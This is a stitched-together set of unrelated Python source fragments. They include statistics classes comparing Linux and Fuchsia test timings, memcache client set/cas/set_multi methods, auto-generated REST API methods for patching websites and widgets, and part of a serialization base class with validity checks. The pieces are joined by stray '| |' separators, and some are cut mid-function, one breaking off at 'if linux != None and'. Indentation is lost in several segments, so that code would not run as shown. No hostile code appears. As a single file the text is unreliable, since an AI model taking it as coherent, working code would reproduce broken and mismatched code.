      time_avg (float): The average measurement.
      time_dev (float): The standard deviation of the measurement.
      cv (float): The coefficient of variance of the measure.
      samples (int): The number of samples that went into making this object.
    """
    self.desc = desc
    self.unit = unit
    self.time_avg = time_avg
    self.time_dev = time_dev
    self.cv = cv
    self.sample_num = samples

  def ToString(self) -> str:
    """Converts the line to a human-readable string."""
    if self.sample_num <= 1:
      return "{}: {:.5f} with only one sample".format(self.desc, self.time_avg)
    return "{}: {:.5f} σ={:.5f} {} with n={} cv={}".format(
        self.desc, self.time_avg, self.time_dev, self.unit, self.sample_num,
        self.cv)
def LineFromList(lines: List[ResultLine]) -> LineStats:
  """Takes a list of ResultLines and generates statistics for them.

  Args:
    lines (List[ResultLine]): The list of lines to generate stats for.

  Returns:
    LineStats: the representation of statistical data for the lines.
  """
  measurements = [entry.meas for entry in lines]
  mean, stddev, coeff = GenStats(measurements)
  # Description and unit are taken from the first sample; all entries in
  # the list share them.
  first = lines[0]
  return LineStats(first.desc, first.unit, mean, stddev, coeff, len(lines))
class TestStats(object):
  """Aggregated statistics for all sampled runs of one named test."""

  def __init__(self, name: str, time_avg: float, time_dev: float, cv: float,
               samples: int, lines: List[LineStats]) -> None:
    """Represents a summary of relevant statistics for a list of tests.

    Args:
      name (str): The name of the test whose runs are being averaged.
      time_avg (float): The average time to execute the test.
      time_dev (float): The standard deviation in the mean.
      cv (float): The coefficient of variance of the population.
      samples (int): The number of samples in the population
      lines (List[LineStats]): The averaged list of all the lines of output
        that comprises this test.
    """
    self.name = name
    self.time_avg = time_avg
    self.time_dev = time_dev
    self.cv = cv
    self.sample_num = samples
    self.lines = lines

  def ToLines(self) -> List[str]:
    """The stats of this test, as well as its constituent LineStats, in a
    human-readable format.

    Returns:
      List[str]: The human-readable list of lines.
    """
    if self.sample_num > 1:
      header = "{}: {:.5f} σ={:.5f}ms with n={} cv={}".format(
          self.name, self.time_avg, self.time_dev, self.sample_num, self.cv)
    else:
      header = "{}: {:.5f} with only one sample".format(
          self.name, self.time_avg)
    return [header] + ["  {}".format(line.ToString()) for line in self.lines]
def TestFromList(tests: List[TestResult]) -> TestStats:
  """Coalesces a list of TestResults into a single TestStats object.

  Args:
    tests (List[TestResult]): The input sample of the tests.

  Returns:
    TestStats: A representation of the statistics of the tests.
  """
  name = tests[0].name
  avg, dev, cv = GenStats([test.time for test in tests])
  # Group every output line by its description across all runs.
  grouped = {}  # type: Dict[str, List[ResultLine]]
  for test in tests:
    assert test.name == name
    for line in test.lines:
      grouped.setdefault(line.desc, []).append(line)
  test_lines = []
  for line_list in grouped.values():
    stat_line = LineFromList(line_list)
    if stat_line:
      test_lines.append(stat_line)
  return TestStats(name, avg, dev, cv, len(tests), test_lines)
class TargetStats(object):
  """Statistics for one built-and-run target over repeated executions."""

  def __init__(self, name: str, samples: int, tests: List[TestStats]) -> None:
    """A representation of the actual target that was built and run on the
    platforms multiple times to generate statistical data.

    Args:
      name (str): The name of the target that was built and run.
      samples (int): The number of times the tests were run.
      tests (List[TestStats]): The statistics of tests included in the target.
    """
    self.name = name
    self.sample_num = samples
    self.tests = tests

  def ToLines(self) -> List[str]:
    """Converts the entire target into a list of lines in human-readable
    format.

    Returns:
      List[str]: The human-readable test lines.
    """
    if self.sample_num > 1:
      out = ["{}: ".format(self.name)]
    else:
      out = ["{}: with only one sample".format(self.name)]
    for test in self.tests:
      out.extend("  {}".format(entry) for entry in test.ToLines())
    return out

  def __format__(self, format_spec):
    # format_spec is intentionally ignored; always the multi-line form.
    return "\n".join(self.ToLines())
def TargetFromList(results: List[TargetResult]) -> TargetStats:
  """Coalesces a list of TargetResults into a single collection of stats.

  Args:
    results (List[TargetResult]): The sampling of target executions to
      generate stats for.

  Returns:
    TargetStats: The body of stats for the sample given.
  """
  name = results[0].name
  sample_num = len(results)
  tests = {}  # type: Dict[str, List[TestResult]]
  for result in results:
    assert result.name == name
    # This groups tests by name so that they can be considered independently,
    # so that in the event tests flake out, their average times can
    # still be accurately calculated.
    # BUGFIX: the original seeded a new group with [test] and then appended
    # the same test again unconditionally, double-counting the first run of
    # every test and skewing the averages.
    for test in result.tests:
      tests.setdefault(test.name, []).append(test)
  test_stats = [TestFromList(test_list) for test_list in tests.values()]
  return TargetStats(name, sample_num, test_stats)
def GenStats(corpus: List[float]) -> Tuple[float, float, float]:
  """Generates statistics from a list of values

  Args:
    corpus (List[float]): The set of data to generate statistics for.

  Returns:
    Tuple[float, float, float]: The mean, standard deviation, and coefficient
    of variation for the given sample data.
  """
  count = len(corpus)
  mean = sum(corpus) / count
  # Population variance: mean of squared deviations from the mean.
  variance = sum((item - mean) * (item - mean) for item in corpus) / count
  stddev = math.sqrt(variance)
  return mean, stddev, stddev / mean
def DirectoryStats(directory: str) -> List[TargetStats]:
    """Takes a path to directory, and uses JSON files in that directory to
    compile a list of statistical objects for each independent test target it
    can detect in the directory.

    Args:
      directory (str): The directory to scan for relevant JSONs.

    Returns:
      List[TargetStats]: Each element in this list is one target, averaged up
        over all of its executions.
    """
    result_map = {}  # type: Dict[str, List[TargetResult]]
    for file_name in os.listdir(directory):
        parsed = ReadTargetFromJson("{}/{}".format(directory, file_name))
        # Collect every execution of the same target under one key.
        result_map.setdefault(parsed.name, []).append(parsed)
    return [TargetFromList(result_list) for result_list in result_map.values()]
def CompareTargets(linux: TargetStats, fuchsia: TargetStats) -> Dict[str, Any]:
    """Compare takes a corpus of statistics from both Fuchsia and Linux, and then
    lines up the values, compares them to each other, and writes them into a
    dictionary that can be JSONified.
    """
    if not (linux and fuchsia):
        # One of them has to be non-null, by the way ZipListsByPredicate functions
        assert linux or fuchsia
        if linux:
            logging.error("Fuchsia was missing test target {}".format(linux.name))
        else:
            logging.error("Linux was missing test target {}".format(fuchsia.name))
        return None
    assert linux.name == fuchsia.name
    matched_tests = ZipListsByPredicate(linux.tests, fuchsia.tests,
                                        lambda test: test.name)
    return {"name": linux.name,
            "tests": MapDictValues(matched_tests, CompareTests)}
def CompareTests(linux: TestStats, fuchsia: TestStats) -> Dict[str, Any]:
    """As CompareTargets, but at the test level.

    Returns an empty dict (after logging) when either side is missing;
    otherwise a JSON-serializable dict with paired per-line stats and the
    summary stats of BOTH operating systems.
    """
    if not linux and not fuchsia:
        logging.error("Two null TestStats objects were passed to CompareTests.")
        return {}
    if not linux or not fuchsia:
        if linux:
            name = linux.name
            failing_os = "Fuchsia"
        else:
            name = fuchsia.name
            failing_os = "Linux"
        logging.error("%s failed to produce output for the test %s",
                      failing_os, name)
        return {}
    # Both sides are guaranteed non-null from here on.
    assert linux.name == fuchsia.name
    paired_lines = ZipListsByPredicate(linux.lines, fuchsia.lines,
                                       lambda line: line.desc)
    paired_lines = MapDictValues(paired_lines, CompareLines)
    result = {"lines": paired_lines, "unit": "ms"}  # type: Dict[str, Any]
    result["name"] = linux.name
    # BUG FIX: the previous if/else meant the else arm was unreachable (linux
    # is always truthy here), so the Fuchsia summary stats were never written
    # and the dead `if fuchsia == None` warning could never fire. Emit both
    # sides' stats so they can actually be compared.
    result["linux_avg"] = linux.time_avg
    result["linux_dev"] = linux.time_dev
    result["linux_cv"] = linux.cv
    result["fuchsia_avg"] = fuchsia.time_avg
    result["fuchsia_dev"] = fuchsia.time_dev
    result["fuchsia_cv"] = fuchsia.cv
    return result
def CompareLines(linux: LineStats, fuchsia: LineStats) -> Dict[str, Any]:
"""CompareLines wraps two LineStats objects up as a JSON-dumpable dict.
It also logs a warning every time a line is given which can't be matched up.
If both lines passed are None, or their units or descriptions are not the same
(which should never happen) this function fails.
"""
if linux != None and | |
module calculate a hash value.
You may prefer, for example, to keep all of a given user's
objects on the same memcache server, so you could use the
user's unique id as the hash value.
@return: Nonzero on success.
@rtype: int
@param time: Tells memcached the time which this value should
expire, either as a delta number of seconds, or an absolute
unix time-since-the-epoch value. See the memcached protocol
docs section "Storage Commands" for more info on <exptime>. We
default to 0 == cache forever.
@param min_compress_len: The threshold length to kick in
auto-compression of the value using the compressor
routine. If the value being cached is a string, then the
length of the string is measured, else if the value is an
object, then the length of the pickle result is measured. If
the resulting attempt at compression yeilds a larger string
than the input, then it is discarded. For backwards
compatability, this parameter defaults to 0, indicating don't
ever try to compress.
@param noreply: optional parameter instructs the server to not
send the reply.
'''
return self._set("set", key, val, time, min_compress_len, noreply)
def cas(self, key, val, time=0, min_compress_len=0, noreply=False):
'''Check and set (CAS)
Sets a key to a given value in the memcache if it hasn't been
altered since last fetched. (See L{gets}).
The C{key} can optionally be an tuple, with the first element
being the server hash value and the second being the key. If
you want to avoid making this module calculate a hash value.
You may prefer, for example, to keep all of a given user's
objects on the same memcache server, so you could use the
user's unique id as the hash value.
@return: Nonzero on success.
@rtype: int
@param time: Tells memcached the time which this value should
expire, either as a delta number of seconds, or an absolute
unix time-since-the-epoch value. See the memcached protocol
docs section "Storage Commands" for more info on <exptime>. We
default to 0 == cache forever.
@param min_compress_len: The threshold length to kick in
auto-compression of the value using the compressor
routine. If the value being cached is a string, then the
length of the string is measured, else if the value is an
object, then the length of the pickle result is measured. If
the resulting attempt at compression yeilds a larger string
than the input, then it is discarded. For backwards
compatability, this parameter defaults to 0, indicating don't
ever try to compress.
@param noreply: optional parameter instructs the server to not
send the reply.
'''
return self._set("cas", key, val, time, min_compress_len, noreply)
    def _map_and_prefix_keys(self, key_iterable, key_prefix):
        """Compute the mapping of server (_Host instance) -> list of keys to
        stuff onto that server, as well as the mapping of prefixed key
        -> original key.

        Each key may be a plain key or a ``(serverhash, key)`` tuple that
        pins the entry to a specific server. Keys are encoded to bytes,
        prefixed with ``key_prefix``, and length-checked (when
        ``self.do_check_key`` is set) before being bucketed by server.

        Returns a ``(server_keys, prefixed_to_orig_key)`` tuple where
        ``server_keys`` maps _Host -> list of prefixed/mangled keys and
        ``prefixed_to_orig_key`` maps each mangled key back to the caller's
        original (un-prefixed) key.
        """
        key_prefix = self._encode_key(key_prefix)
        # Check it just once ...
        key_extra_len = len(key_prefix)
        if key_prefix and self.do_check_key:
            self.check_key(key_prefix)

        # server (_Host) -> list of unprefixed server keys in mapping
        server_keys = {}

        prefixed_to_orig_key = {}
        # build up a list for each server of all the keys we want.
        for orig_key in key_iterable:
            if isinstance(orig_key, tuple):
                # Tuple of hashvalue, key ala _get_server(). Caller is
                # essentially telling us what server to stuff this on.
                # Ensure call to _get_server gets a Tuple as well.
                serverhash, key = orig_key

                key = self._encode_key(key)
                if not isinstance(key, six.binary_type):
                    # set_multi supports int / long keys.
                    key = str(key)
                    if six.PY3:
                        key = key.encode('utf8')
                bytes_orig_key = key

                # Gotta pre-mangle key before hashing to a
                # server. Returns the mangled key.
                server, key = self._get_server(
                    (serverhash, key_prefix + key))

                orig_key = orig_key[1]
            else:
                key = self._encode_key(orig_key)
                if not isinstance(key, six.binary_type):
                    # set_multi supports int / long keys.
                    key = str(key)
                    if six.PY3:
                        key = key.encode('utf8')
                bytes_orig_key = key
                server, key = self._get_server(key_prefix + key)

            # alert when passed in key is None
            if orig_key is None:
                # check_key raises for a None key regardless of do_check_key.
                self.check_key(orig_key, key_extra_len=key_extra_len)

            # Now check to make sure key length is proper ...
            if self.do_check_key:
                self.check_key(bytes_orig_key, key_extra_len=key_extra_len)

            if not server:
                # No live server hashes to this key; silently drop it.
                continue

            if server not in server_keys:
                server_keys[server] = []
            server_keys[server].append(key)
            prefixed_to_orig_key[key] = orig_key

        return (server_keys, prefixed_to_orig_key)
    def set_multi(self, mapping, time=0, key_prefix='', min_compress_len=0,
                  noreply=False):
        '''Sets multiple keys in the memcache doing just one query.

        >>> notset_keys = mc.set_multi({'key1' : 'val1', 'key2' : 'val2'})
        >>> mc.get_multi(['key1', 'key2']) == {'key1' : 'val1',
        ...                                    'key2' : 'val2'}
        1

        This method is recommended over regular L{set} as it lowers
        the number of total packets flying around your network,
        reducing total latency, since your app doesn't have to wait
        for each round-trip of L{set} before sending the next one.

        @param mapping: A dict of key/value pairs to set.
        @param time: Tells memcached the time which this value should
            expire, either as a delta number of seconds, or an
            absolute unix time-since-the-epoch value. See the
            memcached protocol docs section "Storage Commands" for
            more info on <exptime>. We default to 0 == cache forever.
        @param key_prefix: Optional string to prepend to each key when
            sending to memcache. Allows you to efficiently stuff these
            keys into a pseudo-namespace in memcache:

            >> notset_keys = mc.set_multi(
            ...     {'key1' : 'val1', 'key2' : 'val2'},
            ...     key_prefix='subspace_')
            >>> len(notset_keys) == 0
            True
            >>> mc.get_multi(['subspace_key1',
            ...               'subspace_key2']) == {'subspace_key1': 'val1',
            ...                                     'subspace_key2' : 'val2'}
            True

            Causes key 'subspace_key1' and 'subspace_key2' to be
            set. Useful in conjunction with a higher-level layer which
            applies namespaces to data in memcache. In this case, the
            return result would be the list of notset original keys,
            prefix not applied.
        @param min_compress_len: The threshold length to kick in
            auto-compression of the value using the compressor
            routine. If the value being cached is a string, then the
            length of the string is measured, else if the value is an
            object, then the length of the pickle result is
            measured. If the resulting attempt at compression yeilds a
            larger string than the input, then it is discarded. For
            backwards compatability, this parameter defaults to 0,
            indicating don't ever try to compress.
        @param noreply: optional parameter instructs the server to not
            send the reply.
        @return: List of keys which failed to be stored [ memcache out
            of memory, etc. ].
        @rtype: list
        '''
        self._statlog('set_multi')

        server_keys, prefixed_to_orig_key = self._map_and_prefix_keys(
            six.iterkeys(mapping), key_prefix)

        # send out all requests on each server before reading anything
        dead_servers = []
        notstored = []  # original keys.

        for server in six.iterkeys(server_keys):
            bigcmd = []
            # Bind the bound method once; it is called in a tight loop below.
            write = bigcmd.append
            try:
                for key in server_keys[server]:  # These are mangled keys
                    store_info = self._val_to_store_info(
                        mapping[prefixed_to_orig_key[key]],
                        min_compress_len)
                    if store_info:
                        flags, len_val, val = store_info
                        headers = "%d %d %d" % (flags, time, len_val)
                        fullcmd = self._encode_cmd('set', key, headers,
                                                   noreply,
                                                   b'\r\n', val, b'\r\n')
                        write(fullcmd)
                    else:
                        # Value could not be converted for storage; report it
                        # back to the caller as not stored.
                        notstored.append(prefixed_to_orig_key[key])
                # One batched write per server for the whole command list.
                server.send_cmds(b''.join(bigcmd))
            except socket.error as msg:
                if isinstance(msg, tuple):
                    msg = msg[1]
                server.mark_dead(msg)
                dead_servers.append(server)

        # if noreply, just return early
        if noreply:
            return notstored

        # if any servers died on the way, don't expect them to respond.
        for server in dead_servers:
            del server_keys[server]

        # short-circuit if there are no servers, just return all keys
        if not server_keys:
            return list(mapping.keys())

        for server, keys in six.iteritems(server_keys):
            try:
                for key in keys:
                    if server.readline() == b'STORED':
                        continue
                    else:
                        # un-mangle.
                        notstored.append(prefixed_to_orig_key[key])
            except (_Error, socket.error) as msg:
                if isinstance(msg, tuple):
                    msg = msg[1]
                server.mark_dead(msg)
        return notstored
def _val_to_store_info(self, val, min_compress_len):
"""Transform val to a storable representation.
Returns a tuple of the flags, the length of the new value, and
the new value itself.
"""
flags = 0
if isinstance(val, six.binary_type):
pass
elif isinstance(val, six.text_type):
val = val.encode('utf-8')
elif isinstance(val, int):
flags |= Client._FLAG_INTEGER
val = '%d' % val
if six.PY3:
val = val.encode('ascii')
# force no attempt to compress this silly string.
min_compress_len = 0
elif six.PY2 and isinstance(val, long):
flags |= Client._FLAG_LONG
val = str(val)
if six.PY3:
val = val.encode('ascii')
# force no attempt to compress this silly string.
min_compress_len = 0
| |
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def patch_website_by_id(self, id, body, **kwargs): # noqa: E501
"""update website # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.patch_website_by_id(id, body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int id: (required)
:param Website body: (required)
:return: Website
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.patch_website_by_id_with_http_info(id, body, **kwargs) # noqa: E501
else:
(data) = self.patch_website_by_id_with_http_info(id, body, **kwargs) # noqa: E501
return data
def patch_website_by_id_with_http_info(self, id, body, **kwargs): # noqa: E501
"""update website # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.patch_website_by_id_with_http_info(id, body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int id: (required)
:param Website body: (required)
:return: Website
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method patch_website_by_id" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `patch_website_by_id`") # noqa: E501
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `patch_website_by_id`") # noqa: E501
if 'id' in params and not re.search('\d+', params['id'] if type(params['id']) is str else str(params['id'])): # noqa: E501
raise ValueError("Invalid value for parameter `id` when calling `patch_website_by_id`, must conform to the pattern `/\d+/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['LMv1'] # noqa: E501
return self.api_client.call_api(
'/website/websites/{id}', 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Website', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def patch_website_group_by_id(self, id, body, **kwargs): # noqa: E501
"""update website group # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.patch_website_group_by_id(id, body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int id: (required)
:param WebsiteGroup body: (required)
:return: WebsiteGroup
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.patch_website_group_by_id_with_http_info(id, body, **kwargs) # noqa: E501
else:
(data) = self.patch_website_group_by_id_with_http_info(id, body, **kwargs) # noqa: E501
return data
def patch_website_group_by_id_with_http_info(self, id, body, **kwargs): # noqa: E501
"""update website group # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.patch_website_group_by_id_with_http_info(id, body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int id: (required)
:param WebsiteGroup body: (required)
:return: WebsiteGroup
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method patch_website_group_by_id" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `patch_website_group_by_id`") # noqa: E501
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `patch_website_group_by_id`") # noqa: E501
if 'id' in params and not re.search('\d+', params['id'] if type(params['id']) is str else str(params['id'])): # noqa: E501
raise ValueError("Invalid value for parameter `id` when calling `patch_website_group_by_id`, must conform to the pattern `/\d+/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['LMv1'] # noqa: E501
return self.api_client.call_api(
'/website/groups/{id}', 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='WebsiteGroup', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def patch_widget_by_id(self, id, body, **kwargs): # noqa: E501
"""update widget # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.patch_widget_by_id(id, body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int id: (required)
:param Widget body: (required)
:return: Widget
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.patch_widget_by_id_with_http_info(id, body, **kwargs) # noqa: E501
else:
(data) = self.patch_widget_by_id_with_http_info(id, body, **kwargs) # noqa: E501
return data
def patch_widget_by_id_with_http_info(self, id, body, **kwargs): # noqa: E501
"""update widget # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.patch_widget_by_id_with_http_info(id, body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int id: (required)
:param Widget body: (required)
:return: Widget
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method patch_widget_by_id" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `patch_widget_by_id`") # noqa: E501
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `patch_widget_by_id`") # noqa: E501
if 'id' in params and not re.search('\d+', params['id'] if type(params['id']) is str else str(params['id'])): # noqa: E501
raise ValueError("Invalid value for parameter `id` when calling `patch_widget_by_id`, must conform to the pattern `/\d+/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['LMv1'] # noqa: E501
return self.api_client.call_api(
'/dashboard/widgets/{id}', 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Widget', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def schedule_auto_discovery_by_device_id(self, id, **kwargs): # noqa: E501
"""schedule active discovery for a device # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schedule_auto_discovery_by_device_id(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int id: (required)
:param int start:
:param int end:
:param str netflow_filter:
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.schedule_auto_discovery_by_device_id_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.schedule_auto_discovery_by_device_id_with_http_info(id, **kwargs) # noqa: E501
return data
def schedule_auto_discovery_by_device_id_with_http_info(self, id, **kwargs): # noqa: E501
"""schedule | |
if key not in self._fields and key[0] != '_']
if len(unexpected_args) > 0:
raise ValueError(
'Received unexpected construction argument {} for attribute '
'collection {}'.format(unexpected_args, self._fields))
for attribute in self._fields:
if attribute in kwargs:
try:
setattr(self, attribute, kwargs.get(attribute, None))
except AttributeError:
# NB: this is included to allow for read only properties without breaking the paradigm
# Silently catching errors can potentially cover up REAL issues.
pass
def __str__(self):
return '{}(**{})'.format(self.__class__.__name__, json.dumps(self.to_dict(check_validity=False), indent=1))
def __repr__(self):
return '{}(**{})'.format(self.__class__.__name__, self.to_dict(check_validity=False))
def __setattr__(self, key, value):
if not (key.startswith('_') or (key in self._fields) or hasattr(self.__class__, key) or hasattr(self, key)):
# not expected attribute - descriptors, properties, etc
logger.warning(
'Class {} instance receiving unexpected attribute {}.\n\t'
'Ensure that this is not a typo of an expected field name.'.format(self.__class__.__name__, key))
object.__setattr__(self, key, value)
def __getstate__(self):
"""
Method for allowing copying and/or pickling of state.
Returns
-------
dict
The dict representation for the object.
"""
return self.to_dict(check_validity=False, strict=False)
def __setstate__(self, the_dict):
"""
Method for reconstructing from the serialized state.
"""
return self.__init__(**the_dict)
def set_numeric_format(self, attribute, format_string):
"""Sets the numeric format string for the given attribute.
Parameters
----------
attribute : str
attribute for which the format applies - must be in `_fields`.
format_string : str
format string to be applied
Returns
-------
None
"""
# Extend this to include format function capabilities. Maybe numeric_format is not the right name?
if attribute not in self._fields:
raise ValueError('attribute {} is not permitted for class {}'.format(attribute, self.__class__.__name__))
self._numeric_format[attribute] = format_string
def _get_formatter(self, attribute):
"""Return a formatting function for the given attribute. This will default to `str` if no other
option is presented.
Parameters
----------
attribute : str
the given attribute name
Returns
-------
Callable
format function
"""
entry = self._numeric_format.get(attribute, None)
if isinstance(entry, str):
fmt_str = '{0:' + entry + '}'
return fmt_str.format
elif callable(entry):
return entry
else:
return str
def log_validity_error(self, msg):
"""
Log a validity check error message.
Parameters
----------
msg : str
"""
valid_logger.error('{}: {}'.format(self.__class__.__name__, msg))
def log_validity_warning(self, msg):
"""
Log a validity check warning message.
Parameters
----------
msg : str
"""
valid_logger.warning('{}: {}'.format(self.__class__.__name__, msg))
def log_validity_info(self, msg):
"""
Log a validation info message.
Parameters
----------
msg : str
"""
valid_logger.info('{}: {}'.format(self.__class__.__name__, msg))
def is_valid(self, recursive=False, stack=False):
"""Returns the validity of this object according to the schema. This is done by inspecting that all required
fields (i.e. entries of `_required`) are not `None`.
Parameters
----------
recursive : bool
True if we recursively check that child are also valid. This may result in verbose (i.e. noisy) logging.
stack : bool
Print a recursive error message?
Returns
-------
bool
condition for validity of this element
"""
all_required = self._basic_validity_check()
if not recursive:
return all_required
valid_children = self._recursive_validity_check(stack=stack)
return all_required & valid_children
def _basic_validity_check(self):
"""
Perform the basic validity check on the direct attributes with no recursive checking.
Returns
-------
bool
True if all requirements *AT THIS LEVEL* are satisfied, otherwise False.
"""
all_required = True
for attribute in self._required:
present = (getattr(self, attribute) is not None)
if not present:
self.log_validity_error("Missing required attribute {}".format(attribute))
all_required &= present
choices = True
for entry in self._choice:
required = entry.get('required', False)
collect = entry['collection']
# verify that no more than one of the entries in collect is set.
present = []
for attribute in collect:
if getattr(self, attribute) is not None:
present.append(attribute)
if len(present) == 0 and required:
self.log_validity_error(
"Exactly one of the attributes {} should be set, but none are set".format(collect))
choices = False
elif len(present) > 1:
self.log_validity_error(
"Exactly one of the attributes {} should be set, but multiple ({}) are set".format(collect,
present))
choices = False
return all_required and choices
def _recursive_validity_check(self, stack=False):
"""
Perform a recursive validity check on all present attributes.
Parameters
----------
stack : bool
Print a recursive error message?
Returns
-------
bool
True if requirements are recursively satisfied *BELOW THIS LEVEL*, otherwise False.
"""
def check_item(value):
if isinstance(value, (Serializable, SerializableArray)):
return value.is_valid(recursive=True, stack=stack)
return True
valid_children = True
for attribute in self._fields:
val = getattr(self, attribute)
good = True
if isinstance(val, (Serializable, SerializableArray)):
good = check_item(val)
elif isinstance(val, list):
for entry in val:
good &= check_item(entry)
# any issues will be logged as discovered, but should we help with the "stack"?
if not good and stack:
self.log_validity_error(
"Issue discovered with attribute {} of type {}.".format(attribute, type(val)))
valid_children &= good
return valid_children
    @classmethod
    def from_node(cls, node, xml_ns, ns_key=None, kwargs=None):
        """For XML deserialization.

        Walks `cls._fields`, pulling each attribute from `node` as an xml
        attribute, a collection, or a single child element, then delegates
        construction to `cls.from_dict`.

        Parameters
        ----------
        node : ElementTree.Element
            dom element for serialized class instance
        xml_ns : None|dict
            The xml namespace dictionary.
        ns_key : None|str
            The xml namespace key. If `xml_ns` is None, then this is ignored. If `None` and `xml_ns` is not None,
            then the string `default` will be used. This will be recursively passed down,
            unless overridden by an entry of the cls._child_xml_ns_key dictionary.
        kwargs : None|dict
            `None` or dictionary of previously serialized attributes. For use in inheritance call, when certain
            attributes require specific deserialization.

        Returns
        -------
        Corresponding class instance
        """
        if len(node) == 0 and len(node.attrib) == 0:
            logger.warning(
                'There are no children or attributes associated\n\t'
                'with node {}\n\t'
                'for class {}.'.format(node, cls))
            # return None

        def handle_attribute(the_attribute, the_tag, the_xml_ns_key):
            # Attribute values live on node.attrib; the tag must carry the
            # Clark-notation namespace when one is expected.
            if the_xml_ns_key is not None:  # handle namespace, if necessary
